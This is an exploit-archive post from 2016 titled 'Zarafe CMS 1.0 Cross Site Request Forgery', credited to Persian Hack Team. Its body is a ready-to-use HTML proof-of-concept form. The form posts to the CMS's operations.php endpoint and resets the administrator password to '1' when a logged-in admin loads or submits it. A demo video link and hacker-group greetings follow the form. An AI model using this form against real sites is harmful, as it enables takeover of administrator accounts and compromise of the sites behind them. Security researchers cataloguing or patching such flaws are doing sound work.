Home / os / linux

Zarafe CMS 1.0 Cross Site Request Forgery

Posted on 28 August 2016

###################### # Exploit Title : Zarafe CMS 1.0 / CSRF (Rest Admin Password) # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.zarrafeh.net/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 1.0 # Date: 2016/08/27 ###################### # # PoC: Exploit code(s): ================ Rest Admin Password The Code for zarafe.html is <h1 align="Center"> Zarafe CMS CSRF (Rest Admin Password)</h1> <h1 align="Center"> Persian Hack Team </h1> <h1 align="Center"> Discover By Mojtaba MobhaM </h1> <form action="http://target.com/zpanel/includes/operations.php" method="post" name="frm_settings" target="operations"> <table align="center" cellpadding="3px" width="40%" border="1"> <tr> <td align="left" valign="top" width="140px" nowrap="nowrap"></td><td><input name="username" type="text" style="width:100%;" value="admin" /></td> </tr> <tr> <td align="left" valign="top" nowrap="nowrap"></td><td><input name="password" type="password" style="width:100%;" value="1" /> value=1</td> </tr> <tr> <td align="left" valign="top" nowrap="nowrap"></td><td><input name="password_repeat" type="password" style="width:100%;" value="1"/> value=1</td> </tr> <tr> <td></td><td><input name="btn_submit_settings" type="submit" value="EXP" /></td> </tr> </table> </form> #Youtube Demo : https://www.youtube.com/watch?v=7JIYTaAiMig ###################### # Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members # Homepage : persian-team.ir ######################

 

TOP